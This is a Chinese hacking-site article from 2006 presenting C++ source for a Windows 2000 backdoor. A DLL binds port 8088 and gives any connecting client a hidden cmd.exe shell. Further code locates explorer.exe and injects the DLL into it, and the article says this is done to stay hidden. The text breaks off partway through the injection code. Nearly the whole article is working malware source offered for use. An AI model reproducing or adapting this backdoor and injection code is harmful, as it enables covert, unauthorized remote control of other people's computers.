黑基网 首页 服务器 Windows Server 查看内容

WIN2000下一个简单的后门实现

2006-4-3 04:45| 投稿: winserver|

摘要: 不知道大家用过ncx99.exe没有,这个小工具很有用,运行后,它BIND到一个端口,并接管cmd.exe的输 入输出,使得远程用户得到一个SHELL来实现各种操作,不需要特别的客户端,只要用WIND...
不知道大家用过ncx99.exe没有,这个小工具很有用,运行后,它BIND到一个端口,并接管cmd.exe的输 入输出,使得远程用户得到一个SHELL来实现各种操作,不需要特别的客户端,只要用WINDOWS自带的 TELNET客户端就可以了。下面我给出类似这个工具的Source code,我这个工具和ncx99.exe有点不一样,用到了远程线程插入技 术,将ncx99.exe功能封装在一个DLL里,然后将DLL插入到explorer.exe进程里,使得程序运行后无进 程,增强了隐蔽性。 先给出DLL的Source code: // test.cpp : Defines the entry point for the DLL application.//#include "stdafx.h"#include  #define iport 8088   static void WINAPI ThreadProc(void* pVoid){WSADATA wsa;SOCKET serverFD;char Buff[1024]; WSAStartup(MAKEWORD(2,2),&wsa);//初始化WinSock serverFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct sockaddr_in server; server.sin_family = AF_INET;server.sin_port = htons(iport);server.sin_addr.s_addr=ADDR_ANY;int ret=bind(serverFD,(sockaddr *)&server,sizeof(server));ret=listen(serverFD,4);int iAddrSize = sizeof(server); re: SOCKET clientFD=accept(serverFD,(sockaddr *)&server,&iAddrSize);//每次操作完成连接 断开后程序//返回这里继续阻塞,等待客户端连接 SECURITY_ATTRIBUTES sa;sa.nLength=12;sa.lpSecurityDeor=0;sa.bInheritHandle=true;HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);//创建两个匿名管道ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); STARTUPINFO si;ZeroMemory(&si,sizeof(si));si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;si.wShowWindow = SW_HIDE;si.hStdInput = hReadPipe2;si.hStdOutput = si.hStdError = hWritePipe1;char cmdLine[] = "cmd.exe";PROCESS_INFORMATION ProcessInformation;ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);//将匿名管 道和cmd.exe的输入输出关联 unsigned long lBytesRead; while(1) {ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);//管道是否有数据可读if(lBytesRead) {ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);//读取管道里的数据if(!ret)break;ret=send(clientFD,Buff,lBytesRead,0);//将cmd.exe的输出通过socket发送到客户端if(ret<=0) break;}else{lBytesRead=recv(clientFD,Buff,1024,0);//将socket数据读出if(lBytesRead<=0)break;ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);//将接收到的客户端输入写进管道作 为cmd.exe输入send(clientFD,Buff,lBytesRead,0);if(!ret) break;}} goto re; return;}   HANDLE hThreadHandle = NULL; HANDLE HT=NULL; BOOL APIENTRY DllMain( HANDLE hModule, DWORD fdwReason, LPVOID lpReserved){switch(fdwReason){case DLL_PROCESS_ATTACH://首次装载DLL,创建一线程{DWORD dwThreadID;hThreadHandle = CreateThread(NULL, 0, (unsigned long (__stdcall *)(void *)) ThreadProc, NULL, 0, &dwThreadID);}break;case DLL_PROCESS_DETACH:{ if(hThreadHandle)TerminateThread(hThreadHandle,0);} break;case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;} return TRUE;} /******************************************************************/ 接下来是插入DLL到explorer.exe进程里的代码,要将DLL插入到explorer进程里,首先要得到这个进程 的ID,下面是取得进程ID的代码:DWORD CInsertDlg::GetProcessId()//获取explorer.exe进程的ID{DWORD Pid=-1;HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//创建系统快照PROCESSENTRY32 lPrs;ZeroMemory(&lPrs,sizeof(lPrs));lPrs.dwSize=sizeof(lPrs);Process32First(hSnap,&lPrs);//取得系统快照里第一个进程信息if (strstr(targetFile,lPrs.szExeFile))//判断进程信息是否是explorer.exe{Pid=lPrs.th32ProcessID;return Pid;} while(1){ZeroMemory(&lPrs,sizeof(lPrs));lPrs.dwSize=(&lPrs,sizeof(lPrs));if (!Process32Next(hSnap,&lPrs))//继续枚举进程信息{Pid=-1;break;}if (strstr(targetFile,lPrs.szExeFile)){Pid=lPrs.th32ProcessID;break;}} return Pid; } /***************************************************************/得到进程的ID后,就可以执行进程插入: void CInsertDlg::OnButton1() {// TODO: Add your control notification handler code hereDWORD Pid=-1;Pid=GetProcessId();//得到进程ID if (Insert(Pid))//执行远程进程注入{::MessageBox(NULL,"Insert the dll to target process is  success!","Insert",MB_ICONINFORMATION);}else{::MessageBox(NULL,"Insert the dll to target process if failed!","Insert",  

鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

相关分类

返回顶部